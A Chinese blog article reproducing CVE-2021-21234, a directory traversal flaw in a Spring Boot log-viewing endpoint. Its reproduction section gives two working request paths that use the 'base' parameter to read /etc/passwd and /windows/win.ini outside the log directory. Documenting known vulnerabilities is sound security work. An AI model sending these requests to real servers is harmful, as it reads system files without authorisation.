热门标签
热门文章
- 1AI时代的GPU集群网络算力分析_算力规模500p支持高功率ai服务器
- 2springboot+vue商城系统微信小程序附带文章和源代码部署讲解等_springboot+vue微信小程序项目
- 3MySQL数据库快速入门_mysql速
- 4vc取得unicode字符串长度_c++取unicode长度
- 5SpringCloud结合Python,Golang实现多语言微服务架构_微服务多语言开发
- 6STM32创建HAL库工程 (手把手教)_stm32hal库教程
- 7Flink window 源码分析2:Window 的主要组件_flink assignwindows 源码 解读
- 8python lxml.html.fromstring与etree.HTML()
- 9Redis主从&哨兵模式
- 10微信小程序实现可移动悬浮按钮(超简单)_微信小程序悬浮按钮
当前位置: article > 正文
Spring Boot 目录遍历 (CVE-2021-21234)_springboot-cve-2021-21234
作者:秋刀鱼在做梦 | 2024-08-21 06:24:52
赞
踩
springboot-cve-2021-21234
一、漏洞概述
Spring Boot 虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile 将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../ 可以访问日志记录目录之外的文件)。
二、影响范围
0.2.13之前
三、访问页面
四、漏洞复现
- # Windows
- /manage/log/view?filename=/windows/win.ini&base=../../../../../
-
- # linux
- /manage/log/view?filename=/etc/passwd&base=../../../../../
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/秋刀鱼在做梦/article/detail/1010532
推荐阅读
相关标签
